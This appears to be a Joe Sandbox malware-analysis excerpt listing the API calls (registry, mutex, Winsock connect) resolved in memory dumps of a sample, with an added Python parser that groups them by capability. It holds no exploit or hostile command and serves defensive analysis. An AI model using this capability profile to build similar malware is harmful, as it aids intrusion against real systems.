                                                                                                                                                                    • getaddrinfo.WS2_32(?,00000E84), ref: 051714AF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getaddrinfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 300660673-0
                                                                                                                                                                    • Opcode ID: ed1b9a01c74713234acb143ae4a56fbe615962c96f5957b17ea1a465be0618e1
                                                                                                                                                                    • Instruction ID: 0ba1a80df9399f6132c990bdefae9ca99102b0554a7fa2d57a7ecb607ece9eaf
                                                                                                                                                                    • Opcode Fuzzy Hash: ed1b9a01c74713234acb143ae4a56fbe615962c96f5957b17ea1a465be0618e1
                                                                                                                                                                    • Instruction Fuzzy Hash: 9F21D172100204AEEB30DF65CC84FA6F7ECEF04314F04885AFA499B681D775A949CB75
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegSetValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB3D4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
• Opcode ID: 9a6aa56bb57a6b57a41c5f9ce4e6b6f6c33f7f2d4d4d9096f1661d779d2984c9
• Instruction ID: cbad8fc18f0bd9a5c4118d7b41653f2534288da0dfb8668197bdb1e371dfc767
• Opcode Fuzzy Hash: 9a6aa56bb57a6b57a41c5f9ce4e6b6f6c33f7f2d4d4d9096f1661d779d2984c9
• Instruction Fuzzy Hash: 6821C3765043846FE722CB11CC44BA3BFB8EF06324F08849AE9858B6A3D324E809C771
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetExitCodeProcess.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171A04
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: CodeExitProcess
• String ID:
• API String ID: 3861947596-0
• Opcode ID: fd9e7119b915f513c13d6476f30427a752dc1b1c6d23aa7b0de55a06b989ed5a
• Instruction ID: bfa4b802ab34b46dd7834aa8a67cd2460bcc9a2e31caecb135e0050dd151a2b5
• Opcode Fuzzy Hash: fd9e7119b915f513c13d6476f30427a752dc1b1c6d23aa7b0de55a06b989ed5a
• Instruction Fuzzy Hash: D321C4715093846FE712CB25CC44FA6BFB8EF42314F0884DAE944DF593D268A909C775
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileType.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB211
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: f08339ca0812787799b96016eec1743b5afc94c8c3240464d9ece0c9b1633de2
• Instruction ID: 4499895df80b8faa8c1a2dfec68f4cd8bcd320091bc25049307e5d441319b0c7
• Opcode Fuzzy Hash: f08339ca0812787799b96016eec1743b5afc94c8c3240464d9ece0c9b1633de2
• Instruction Fuzzy Hash: 96213AB54093806FE7128B15DC85BB2BFBCEF46324F0884D6ED848B6A3D364A909C775
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
• Opcode ID: 9da80e7d0ba36312c813a89f644241c50dda12fd7bb18804c88cae851417d396
• Instruction ID: d11136e19fa45cdc2c835d81f12ecc644b10c0fedd49ef3a640888b646100605
• Opcode Fuzzy Hash: 9da80e7d0ba36312c813a89f644241c50dda12fd7bb18804c88cae851417d396
• Instruction Fuzzy Hash: 8E21B171405344AFE722CB15DC44FA6FFF8EF09224F04849EE9858B652D375A558CB62
Uniqueness
Uniqueness Score: -1.00%

APIs
• WSASocketW.WS2_32(?,?,?,?,?), ref: 051707CA
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: Socket
• String ID:
• API String ID: 38366605-0
• Opcode ID: 9df6a109b80a8b1a1ae621a55e47fd5b82ef5d93314528d81021f45db69b6895
• Instruction ID: 92be4280e6ed0a5dab4953c525759086bc03ea83aba078697a233749b8b6a7d1
• Opcode Fuzzy Hash: 9df6a109b80a8b1a1ae621a55e47fd5b82ef5d93314528d81021f45db69b6895
• Instruction Fuzzy Hash: 8A219171405344AFDB21CF55CC44F66FFB4EF05210F04889EE9858B652D375A418CB62
Uniqueness
Uniqueness Score: -1.00%

APIs
• ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E84), ref: 05170C73
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: DescriptorSecurity$ConvertString
• String ID:
• API String ID: 3907675253-0
• Opcode ID: 1573d564220a8f9c518ce0c770826da0723698cc8759d3831230e1aca2f1835e
• Instruction ID: 633145ddb6ddac0af64800fc693091afec146ceef1eb62d5b236c3a6e584857c
• Opcode Fuzzy Hash: 1573d564220a8f9c518ce0c770826da0723698cc8759d3831230e1aca2f1835e
• Instruction Fuzzy Hash: 8E21C272600304AFEB20CF29DC49FAABBE8EF04314F04885AE945CB641D774E5098AA2
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05170B88
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: bc5650936ec3542dd961922653a7f5c56da43df9e59c3e6ce61e19b797945426
• Instruction ID: ea0075463119e9105f000871ebf8c384a0d57275291f39310c61c20041164a41
• Opcode Fuzzy Hash: bc5650936ec3542dd961922653a7f5c56da43df9e59c3e6ce61e19b797945426
• Instruction Fuzzy Hash: 5F21D176504384AFD721CB15CC88F67BFF8EF49314F08849AE9858B692D325E508CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00FFB125
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: cd1a03c2122bf1b69cc24adefabf5266d8ccf34c83b528fc4d19546bf100fb25
• Instruction ID: a15b66a4b2eb432bfe34eb66df867e549f2ea64a08a92d1541bcc400bda43db8
• Opcode Fuzzy Hash: cd1a03c2122bf1b69cc24adefabf5266d8ccf34c83b528fc4d19546bf100fb25
• Instruction Fuzzy Hash: 2E218171500204AFEB21CF66DC85B66FBE8EF04720F04845DEA458B662D375E518DB71
Uniqueness
Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 051716FA
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 403b18116176ec744ae196a8c235bfd35db38aa5b79cbc5e2c270142b978a250
• Instruction ID: 328e45b25dab20713e9804b4b35616faf639bd85ac48fda3a54968e6b9f338da
• Opcode Fuzzy Hash: 403b18116176ec744ae196a8c235bfd35db38aa5b79cbc5e2c270142b978a250
• Instruction Fuzzy Hash: 12218E766093C05FDB128B25DC55BA2BFF8EF06220F0C84DAE8C5CB263D2649848C761
Uniqueness
Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB2DD
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 2fca557e487dc827ccac949f4796c429765ce35f6bf0551bac2d5cf1cb0248a5
• Instruction ID: 121176d0b67f30cbe695aef346d6fb5cf34dc6f90ba49c42d31686fedd275d15
• Opcode Fuzzy Hash: 2fca557e487dc827ccac949f4796c429765ce35f6bf0551bac2d5cf1cb0248a5
• Instruction Fuzzy Hash: 0021A471409384AFD7228B51DC44F66BFB8EF46314F08849BE9848B563C265A919CB76
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNEL32(?,00000E84), ref: 00FFAB8D
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 449d69b0817d8e93ce55a2104afb8d5d7b0b25e387d8051b00bc61bd2ecef6bc
• Instruction ID: 612b6c025cb43dd341bd727c9ab87b6ece3888985d4ee0759605f904cc7ed1ea
• Opcode Fuzzy Hash: 449d69b0817d8e93ce55a2104afb8d5d7b0b25e387d8051b00bc61bd2ecef6bc
• Instruction Fuzzy Hash: C221A4B2500208AEEB218F55CC44FBBFBECEF44324F04845AEA4587652D774E549CAB6
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171BC7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessSizeWorking
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584180929-0
                                                                                                                                                                    • Opcode ID: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
                                                                                                                                                                    • Instruction ID: 2e1ff3f875dc2a80a5ee50175327cddf354b83df01e7d82d8d83f29fefb9228f
                                                                                                                                                                    • Opcode Fuzzy Hash: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B21D4715053846FDB21CB65CC44FA6BFB8EF45220F08849AE944CB552D374A518CBB6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171AE3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessSizeWorking
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584180929-0
                                                                                                                                                                    • Opcode ID: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
                                                                                                                                                                    • Instruction ID: 05139c42356b73382113b684d47680d9aa65cda35a587fb597cbfb5bb275658c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
                                                                                                                                                                    • Instruction Fuzzy Hash: 7121D4715093846FDB21CB25DC84FA6BFB8EF45220F08849AE944DB552D374A518CB76
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateMutexW.KERNEL32(?,?), ref: 00FFB595
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutex
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1964310414-0
                                                                                                                                                                    • Opcode ID: ceb28a9b28c5ec63321b5f88c8eaa8d26dd2f8870e5255f12647c8ab52384839
                                                                                                                                                                    • Instruction ID: 263b862a3bda442467fb722ad607c502d074959fecbf9873f0d3747bed246e1e
                                                                                                                                                                    • Opcode Fuzzy Hash: ceb28a9b28c5ec63321b5f88c8eaa8d26dd2f8870e5255f12647c8ab52384839
                                                                                                                                                                    • Instruction Fuzzy Hash: 0321B3716002049FEB10CF25DC45BA6FBE8EF04320F088459ED498B656D775E908CA75
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFAC90
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: ec6ccbe1677a4966589eb7ebd5d03d60de3a69e0ebb6ac4103c2d41b8c676e66
                                                                                                                                                                    • Instruction ID: 1328bf2b29066daceeea1b189ba4f2e56f824a2362f9fb638546cf338e04999c
                                                                                                                                                                    • Opcode Fuzzy Hash: ec6ccbe1677a4966589eb7ebd5d03d60de3a69e0ebb6ac4103c2d41b8c676e66
                                                                                                                                                                    • Instruction Fuzzy Hash: 4A2163B6600204AFE721CF15CC84FA6F7ECEF04720F04845AEA498B761D764E949DAB6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileView
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3314676101-0
                                                                                                                                                                    • Opcode ID: 1466539cfee8ac0a01356190180c68f80e3504f59be28010d9d63606d8f7f8c4
                                                                                                                                                                    • Instruction ID: 682b28e9c08bc4a52730dea28747e594a7b03b1f12d992e40fe397e5ab406560
                                                                                                                                                                    • Opcode Fuzzy Hash: 1466539cfee8ac0a01356190180c68f80e3504f59be28010d9d63606d8f7f8c4
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E21C371500204AFEB21CF16DC49FA6FBE8EF08324F04845DE9458B652D775E459CBA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05171636
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Connect
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3144859779-0
                                                                                                                                                                    • Opcode ID: 3dcd465e0c2a210785a8671fb3a33b3b42caf15bb745d4eb602127cfa0f0c325
                                                                                                                                                                    • Instruction ID: a370093042f6fb7fd1344f417ce14bcf1be76400ae846765c948077cbddd8d34
                                                                                                                                                                    • Opcode Fuzzy Hash: 3dcd465e0c2a210785a8671fb3a33b3b42caf15bb745d4eb602127cfa0f0c325
                                                                                                                                                                    • Instruction Fuzzy Hash: 23219F75508384AFDB228F65DC44F62BFF4EF46310F0888DAE9858B163D375A819DB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • WSASocketW.WS2_32(?,?,?,?,?), ref: 051707CA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Socket
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 38366605-0
                                                                                                                                                                    • Opcode ID: 53788e6b682ed3e0feeb1c2c73d62909b62e86c312abedb35b7dd829002a609f
                                                                                                                                                                    • Instruction ID: 057d70d1283b626743d2718291a881bd32074a1e86e8619d704bd204ffe74a6b
                                                                                                                                                                    • Opcode Fuzzy Hash: 53788e6b682ed3e0feeb1c2c73d62909b62e86c312abedb35b7dd829002a609f
                                                                                                                                                                    • Instruction Fuzzy Hash: 6321CF71500204AFEB21CF65CC49FA6FBE4EF08320F04885EE9858B652D375A418CBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageTimeoutA.USER32(?,00000E84), ref: 00FFB6A5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSendTimeout
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1599653421-0
                                                                                                                                                                    • Opcode ID: f9f7b87c7bf1867dd19881efa6272aafcab08a3080eed77572ba2918fd098a42
                                                                                                                                                                    • Instruction ID: dd569c7839d15c168e1b311f4f8dbf4b0871cb55225a7852a6c73a071bd26fd8
                                                                                                                                                                    • Opcode Fuzzy Hash: f9f7b87c7bf1867dd19881efa6272aafcab08a3080eed77572ba2918fd098a42
                                                                                                                                                                    • Instruction Fuzzy Hash: C321DF72500204AFEB318F11CC44FB6FBE8EF04320F14849AEE458AAA1D375A519DBB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05170B88
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                    • Opcode ID: c8b7e6515be48ab58d4092b57346d581ba50f202c35e5fcbce5bb2ece294e6dc
                                                                                                                                                                    • Instruction ID: 810c50e2003dc339fbaadcdc7fd562addb3f210c8bad9b88d9e6919b3b8ed937
                                                                                                                                                                    • Opcode Fuzzy Hash: c8b7e6515be48ab58d4092b57346d581ba50f202c35e5fcbce5bb2ece294e6dc
                                                                                                                                                                    • Instruction Fuzzy Hash: D111A276500704AFDB20CF55CC84FA6B7E8EF08714F04849AE9458B652D764E548CAB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
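The records in this section are Joe Sandbox's per-function output: each block names the API a resolved call stub reaches (RegOpenKeyExW, CreateMutexW, WSASocketW, WSAConnect, RegSetValueExW and so on), the memory dump it was carved from, and opcode/instruction hashes. Read one at a time they say little; grouped by dump they tell you which unpacked region carries registry, mutex and Winsock code. The script below is an added example, not part of the report and not Joe Sandbox code: it parses records in exactly this text format, summarises the API names per dump offset, and flags records that share an Opcode ID while their Instruction IDs differ (the two ProcessWorkingSetSize stubs above do this). The sample text is an abridged copy of records from this section. The CAPABILITY grouping is an analyst's own assumption rather than anything the report defines, and the reading of a shared Opcode ID as "same mnemonic sequence, different operands" is likewise an assumption about how the hashes are computed.

```python
"""Parse Joe Sandbox per-function records (the 'APIs / Memory Dump Source /
Similarity / Uniqueness' blocks) into a per-dump capability summary.
Added example, not part of the report; sample text is abridged from it."""
import re
from collections import defaultdict

# Constructed sample: records copied from this section, cut down to the
# lines the parser uses. Header lines without a bullet are skipped, and
# one record (the FileView one) has an empty APIs list, as on the page.
SAMPLE = """\
APIs
• RegOpenKeyExW.KERNEL32(?,00000E84), ref: 00FFAB8D
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
• API ID: Open
• Opcode ID: 449d69b0817d8e93ce55a2104afb8d5d7b0b25e387d8051b00bc61bd2ecef6bc
• Instruction ID: 612b6c025cb43dd341bd727c9ab87b6ece3888985d4ee0759605f904cc7ed1ea
Uniqueness Score: -1.00%
APIs
• SetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171BC7
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
• Opcode ID: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
• Instruction ID: 2e1ff3f875dc2a80a5ee50175327cddf354b83df01e7d82d8d83f29fefb9228f
APIs
• GetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171AE3
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
• Opcode ID: 1cfa79a78e4a8400615b185ed0d07d1357907d2de193655ffc765d5f29109ba9
• Instruction ID: 05139c42356b73382113b684d47680d9aa65cda35a587fb597cbfb5bb275658c
APIs
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
• API ID: FileView
APIs
• WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05171636
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
APIs
• CreateMutexW.KERNEL32(?,?), ref: 00FFB595
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
"""

API_RE = re.compile(r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")

# Analyst's grouping of the APIs seen in this section (assumption, not
# something the report defines).
CAPABILITY = {
    "registry": {"RegOpenKeyExW", "RegQueryValueExW", "RegSetValueExW"},
    "network": {"WSASocketW", "WSAConnect"},
    "mutex": {"CreateMutexW"},
    "working-set": {"GetProcessWorkingSetSize", "SetProcessWorkingSetSize"},
}


def parse_records(text):
    """One record per 'APIs' header; bullets are parsed, other lines skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            records.append({"apis": [], "offset": None, "based_on_pe": None, "fields": {}})
            continue
        if not records or not line.startswith("•"):
            continue  # section headers and Uniqueness lines carry no data
        rec = records[-1]
        if m := API_RE.match(line):
            rec["apis"].append({"api": m["api"], "module": m["module"],
                                "args": m["args"].split(","), "ref": m["ref"]})
        elif m := SRC_RE.match(line):
            rec["source_file"], rec["offset"] = m["file"], m["offset"]
            rec["based_on_pe"] = m["pe"] == "true"
        elif m := FIELD_RE.match(line):
            rec["fields"][m["key"]] = m["value"]
    return records


def apis_by_dump(records):
    """Map each memory-dump offset to the sorted API names resolved in it."""
    out = defaultdict(set)
    for rec in records:
        out[rec["offset"]].update(a["api"] for a in rec["apis"])
    return {k: sorted(v) for k, v in out.items()}


def capability_tags(api_names):
    """Tag a list of API names with the analyst-defined capability groups."""
    return {tag for tag, apis in CAPABILITY.items() if apis & set(api_names)}


def shared_opcode_ids(records):
    """Opcode IDs that several records share while their Instruction IDs
    differ: taken here to mean the same mnemonic sequence with different
    operands (assumption about how Joe Sandbox derives the two hashes)."""
    groups = defaultdict(list)
    for rec in records:
        oid = rec["fields"].get("Opcode ID")
        if oid:
            groups[oid].append((rec["apis"][0]["api"] if rec["apis"] else None,
                                rec["fields"].get("Instruction ID")))
    return {oid: hits for oid, hits in groups.items()
            if len(hits) > 1 and len({iid for _, iid in hits}) > 1}
```

Point the parser at the whole function-analysis section of a report and the per-dump summary shows, for this sample, that the 00FFA000 region carries the registry and mutex code while the 05170000 region carries the Winsock calls; records with an empty API list (the FileView one) still keep their dump offset and Similarity fields, so they are not silently lost.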

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegSetValueExW.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB3D4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                    • Opcode ID: dcb0006f79f42c7a38ffffa658381bbef9b17c1a9a3efedc84d8f4d93f5b6421
                                                                                                                                                                    • Instruction ID: 621b976dc5a653b4129fa369ad50344cec8444effe61e8b4bc2b2a1163167266
                                                                                                                                                                    • Opcode Fuzzy Hash: dcb0006f79f42c7a38ffffa658381bbef9b17c1a9a3efedc84d8f4d93f5b6421
                                                                                                                                                                    • Instruction Fuzzy Hash: 8911B476500204AFE7218F11CC44FA6BBE8EF04720F04845AEE4587752D774E409DAB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessTimes.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 0517137D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessTimes
